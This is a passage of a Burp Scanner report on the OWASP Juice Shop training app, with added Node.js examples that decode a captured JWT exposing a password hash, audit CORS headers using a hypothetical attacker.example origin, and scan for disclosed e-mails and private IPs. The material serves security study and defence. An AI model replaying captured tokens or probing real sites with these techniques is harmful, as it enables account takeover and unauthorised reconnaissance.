    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 458
    ETag: W/"1ca-oQ64vYpHG9RIEsQ0IggpAg"
    Date: Sun, 15 Jan 2017 21:01:01 GMT
    Connection: close

    {"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2I
    ...[SNIP]...
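The token returned by this login, and replayed by the later requests in this section as both the `Authorization: Bearer` header and the `token` cookie, is a JSON Web Token. Its three dot-separated segments are base64url text, not ciphertext, so anyone holding the token can read every claim without the HS256 signing key. The added example below (not part of the Burp report or of Juice Shop) decodes the token copied from this report and flags claim names that should never be placed in a token; on this payload the walk reports `data.password`, a 32-character hex value carried next to the account id and e-mail. The claim-name pattern and the `isExpired` helper are the example's own choices, not anything the report states.

```javascript
// Added example, not code from the Burp report or from Juice Shop: decode the
// header and payload of the JWT issued by POST /rest/user/login above (copied
// from the report) without verifying its signature, and flag claim names that
// should not travel inside a token. No key is needed: JWT segments are
// base64url text, not ciphertext.

const JUICE_SHOP_TOKEN =
  'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0';

// base64url -> bytes: swap the URL-safe alphabet back and restore the padding
// that compact JWS serialization strips.
function base64UrlToBuffer(segment) {
  const b64 = segment.replace(/-/g, '+').replace(/_/g, '/');
  return Buffer.from(b64 + '='.repeat((4 - (b64.length % 4)) % 4), 'base64');
}

// Split a compact JWS into its three parts and parse the two JSON ones.
// This deliberately does NOT check the signature; it is a reading tool.
function decodeJwt(token) {
  const parts = token.split('.');
  if (parts.length !== 3) throw new Error('expected header.payload.signature');
  return {
    header: JSON.parse(base64UrlToBuffer(parts[0]).toString('utf8')),
    payload: JSON.parse(base64UrlToBuffer(parts[1]).toString('utf8')),
    signatureLength: base64UrlToBuffer(parts[2]).length, // 32 bytes for HS256
  };
}

// Depth-first walk of the payload returning dotted paths of suspicious claims.
// The name list is this example's own heuristic.
const SENSITIVE_CLAIM = /^(password|passwd|pwd|secret|hash|salt|ssn|creditcard)$/i;
function findSensitiveClaims(value, path = '') {
  if (value === null || typeof value !== 'object' || Array.isArray(value)) return [];
  const hits = [];
  for (const [key, child] of Object.entries(value)) {
    const here = path ? `${path}.${key}` : key;
    if (SENSITIVE_CLAIM.test(key)) hits.push(here);
    hits.push(...findSensitiveClaims(child, here));
  }
  return hits;
}

// exp is seconds since the epoch; a token with no exp never expires.
function isExpired(payload, nowSeconds) {
  return typeof payload.exp === 'number' && nowSeconds >= payload.exp;
}

const decoded = decodeJwt(JUICE_SHOP_TOKEN);
console.log(decoded.header);                          // { alg: 'HS256', typ: 'JWT' }
console.log(findSensitiveClaims(decoded.payload));    // [ 'data.password' ]
console.log('lifetime (s):', decoded.payload.exp - decoded.payload.iat); // 18000
```

The `iat` and `exp` claims put the token's lifetime at five hours, and the signature segment decodes to 32 bytes, consistent with the `HS256` header; neither fact reduces the exposure, because the payload is readable by anyone who captures the header or cookie shown in the requests above.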
    15.104. http://192.168.61.143:3000/rest/user/whoami

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/user/whoami

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /rest/user/whoami HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 43
    ETag: W/"2b-FMn/4uFOBvpEHr18dhkCVQ"
    Date: Sun, 15 Jan 2017 21:02:57 GMT
    Connection: close

    {"id":7,"email":"mike_landeck@hotmail.com"}
    15.105. http://192.168.61.143:3000/socket.io/

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /socket.io/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /socket.io/ HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 400 Bad Request
    Content-Type: application/json
    Access-Control-Allow-Origin: *
    Date: Sun, 15 Jan 2017 21:22:24 GMT
    Connection: close
    Content-Length: 40

    {"code":0,"message":"Transport unknown"}
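The `Access-Control-Allow-Origin: *` header recurs in every entry of this section, so an added example follows (it is not part of the Burp report or of Juice Shop): a small Node.js script that parses a raw response and states what a page on another origin could do with it. Two caveats the scanner text does not draw out: a wildcard policy is never credentialed, because browsers neither attach cookies or the `Authorization` header under `*` nor expose a response that pairs `*` with `Access-Control-Allow-Credentials: true`, so the bearer-token endpoints above are readable cross-origin only to the extent an unauthenticated request succeeds (the IP-based access control scenario the scanner names is the realistic one); and the `Vary: Origin` cache concern applies to policies that echo the request `Origin`, whereas a fixed `*` is the same for every client. The first sample is built from the `/rest/basket/4` response shown above; the second, reflected-origin response and the `http://attacker.example` origin are hypothetical.

```javascript
// Added example, not code from the Burp report or from Juice Shop: classify the
// CORS posture of a raw HTTP response. The first sample is constructed from the
// /rest/basket/4 response shown in this report; the second is a hypothetical
// reflected-origin response used for contrast.

const JUICE_SHOP_BASKET_RESPONSE = [
  'HTTP/1.1 200 OK',
  'X-Powered-By: Express',
  'Access-Control-Allow-Origin: *',
  'X-Content-Type-Options: nosniff',
  'X-Frame-Options: SAMEORIGIN',
  'Content-Type: application/json; charset=utf-8',
  'Content-Length: 153',
  '',
  '{"status":"success","data":{"id":4,"coupon":null,"createdAt":"2017-01-15T21:01:01.000Z","updatedAt":"2017-01-15T21:01:01.000Z","UserId":7,"products":[]}}',
].join('\r\n');

// Hypothetical (not observed on Juice Shop): echoes the request Origin, allows
// credentials, and omits Vary: Origin.
const HYPOTHETICAL_REFLECTED_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Access-Control-Allow-Origin: http://attacker.example',
  'Access-Control-Allow-Credentials: true',
  'Content-Type: application/json',
  '',
  '{"secret":true}',
].join('\r\n');

// Parse the header block of an HTTP/1.1 response into a lower-cased name -> value map.
function parseHeaders(raw) {
  const headers = {};
  for (const line of raw.split(/\r?\n/).slice(1)) { // slice(1) skips the status line
    if (line === '') break;                         // empty line ends the header block
    const idx = line.indexOf(':');
    if (idx < 0) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    headers[name] = name in headers ? `${headers[name]}, ${value}` : value;
  }
  return headers;
}

// Report what a page on requestOrigin (the Origin the probe request carried)
// could do with this response.
function auditCors(raw, requestOrigin) {
  const h = parseHeaders(raw);
  const acao = h['access-control-allow-origin'];
  const credentials = (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  const varyOrigin = (h['vary'] || '').split(',').map(s => s.trim().toLowerCase()).includes('origin');
  const findings = [];

  if (acao === undefined) {
    return { policy: 'none', credentialed: false, varyOrigin, findings };
  }
  if (acao === '*') {
    // Browsers send no cookies or Authorization header under a wildcard policy and
    // refuse to expose a response that pairs "*" with Allow-Credentials: true, so
    // only what an unauthenticated request returns is readable cross-origin.
    findings.push('wildcard: any origin can read the unauthenticated response');
    if (credentials) findings.push('"*" combined with Allow-Credentials: browsers reject this');
    // A fixed "*" does not depend on the request Origin, so a shared cache serving
    // it to every client returns the same value; Vary: Origin adds nothing here.
    return { policy: 'wildcard', credentialed: false, varyOrigin, findings };
  }
  if (requestOrigin !== undefined && acao === requestOrigin) {
    // The probe sent an arbitrary Origin and got it back: the server reflects.
    findings.push('reflected: the request Origin is echoed back');
    if (credentials) findings.push('reflected origin with credentials: authenticated data readable cross-origin');
    if (!varyOrigin) findings.push('no Vary: Origin: a shared cache may hand one origin\'s ACAO to another');
    return { policy: 'reflected', credentialed: credentials, varyOrigin, findings };
  }
  return { policy: 'allowlist', credentialed: credentials, varyOrigin, findings };
}

console.log(auditCors(JUICE_SHOP_BASKET_RESPONSE, 'http://attacker.example'));
console.log(auditCors(HYPOTHETICAL_REFLECTED_RESPONSE, 'http://attacker.example'));
```

To use this against a live target, send the same request twice with different `Origin` values and feed both raw responses to `auditCors`; a policy that comes back as `reflected` for an origin you made up is the case that deserves the scanner's High-severity "arbitrary origin trusted" classification, while a constant `*` is the Information-level finding recorded in this section.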
    16. Cross-domain POST

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

    Issue background

    Applications sometimes use POST requests to transfer sensitive information from one domain to another. This does not necessarily constitute a security vulnerability, but it creates a trust relationship between the two domains. Data transmitted between domains should be reviewed to determine whether the originating application should be trusting the receiving domain with this information.

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    <div class="row">\n <form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank" style="display: inline-block;">\n <div class="paypal_donation_button">
    ...[SNIP]...
    17. Email addresses disclosed

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

The following email address was disclosed in the response: paypal@owasp.org

    Issue background

    The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

    However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    <input type="hidden" name="business" value="paypal@owasp.org">
    ...[SNIP]...
    18. Private IP addresses disclosed

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

The following RFC 1918 IP address was disclosed in the response: 192.168.99.100

    Issue background

    RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organization, the private addresses used internally cannot usually be determined in the same ways.

    Discovering the private addresses used within an organization can help an attacker in carrying out network-layer attacks aiming to penetrate the organization's internal infrastructure.

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    ce-shop.herokuapp.com","https://juice-shop-staging.herokuapp.com":"https://juice-shop-staging.herokuapp.com","http://localhost:3000":"http://localhost:3000","http://juice.sh":"http://juice.sh","http://192.168.99.100:3000":"http://tinyurl.com/ipMacLocalhost"},j=c.protocol()+"://"+location.host;a.oauthUnavailable=!i[j],a.oauthUnavailable&&console.log(j+" is not an authorized redirect URI for this application.")}]),
    ...[SNIP]...
    ce-shop.herokuapp.com","https://juice-shop-staging.herokuapp.com":"https://juice-shop-staging.herokuapp.com","http://localhost:3000":"http://localhost:3000","http://juice.sh":"http://juice.sh","http://192.168.99.100:3000":"http://tinyurl.com/ipMacLocalhost"},j=c.protocol()+"://"+location.host;a.oauthUnavailable=!i[j],a.oauthUnavailable&&console.log(j+" is not an authorized redirect URI for this application.")}]),
    ...[SNIP]...
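Both disclosures in sections 17 and 18 come from the same minified bundle. The added example below (not part of the Burp report or of Juice Shop) runs the matching logic over text built from the response snippets above, carrying the RFC 1918 check through correctly for 172.16.0.0/12, which a plain `172.` prefix test gets wrong, and rejecting dotted strings with an octet above 255. The three extra strings in the sample are constructed edge cases, not content from the bundle.

```javascript
// Added example, not code from the Burp report or from Juice Shop: scan response
// text for the two disclosures reported against /dist/juice-shop.min.js, e-mail
// addresses and RFC 1918 addresses. The sample is constructed from the snippets
// shown above plus three made-up strings that exercise the boundaries of the check.

const SAMPLE_RESPONSE_TEXT = [
  '<input type="hidden" name="business" value="paypal@owasp.org">',
  '{"http://localhost:3000":"http://localhost:3000","http://juice.sh":"http://juice.sh",',
  '"http://192.168.99.100:3000":"http://tinyurl.com/ipMacLocalhost"}',
  // Constructed edge cases: public 172.32/16 (not RFC 1918), a 10/8 address,
  // and an octet above 255 that is not an address at all.
  'var cdn="http://172.32.1.1/lib.js", api="http://10.0.0.5/", bad="192.168.1.999";',
].join('\n');

const EMAIL_RE = /[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}/g;
// Four dotted decimal groups not glued to further digits or dots on either side.
const IPV4_RE = /(?<![\d.])(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})(?![\d.])/g;

// RFC 1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16.
function isRfc1918(octets) {
  const [a, b] = octets;
  return a === 10 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Unique e-mail addresses in order of first appearance.
function findEmails(text) {
  return [...new Set(text.match(EMAIL_RE) || [])];
}

// Unique RFC 1918 addresses in order of first appearance.
function findPrivateIps(text) {
  const hits = new Set();
  for (const m of text.matchAll(IPV4_RE)) {
    const octets = m.slice(1, 5).map(Number);
    if (octets.some(o => o > 255)) continue; // e.g. 192.168.1.999 is not an address
    if (isRfc1918(octets)) hits.add(octets.join('.'));
  }
  return [...hits];
}

console.log(findEmails(SAMPLE_RESPONSE_TEXT));     // [ 'paypal@owasp.org' ]
console.log(findPrivateIps(SAMPLE_RESPONSE_TEXT)); // [ '192.168.99.100', '10.0.0.5' ]
```

Run over the real bundle, the same two functions reproduce the scanner's findings; whether either one matters is the review the "Issue background" text asks for, since `paypal@owasp.org` is a deliberately published donation address and `192.168.99.100` is a documented local-development redirect URI rather than internal infrastructure.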
    19. HTML does not specify charset

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /socket.io/

    Issue description

    If a response states that it contains HTML content but does not specify a character set, then the browser may analyze the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

    In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of affected responses, and the context in which they appear, to determine whether any vulnerability exists.

    Request 1

    GET /socket.io/?EIO=3&transport=websocket&sid=1uGV4rL6GpBTykvMAAAC HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Sec-WebSocket-Version: 13
    Origin: http://192.168.61.143:3000
    Sec-WebSocket-Extensions: permessage-deflate
    Sec-WebSocket-Key: /1vQNITk+6NMWtMs77iTHw==
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: keep-alive, Upgrade
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade: websocket

    Response 1

    HTTP/1.1 400 Bad Request
    Connection: close
    Content-type: text/html
    Content-Length: 18

    Session ID unknown

    Report generated by Burp Scanner v1.7.14, at Sun Jan 15 14:04:20 PST 2017.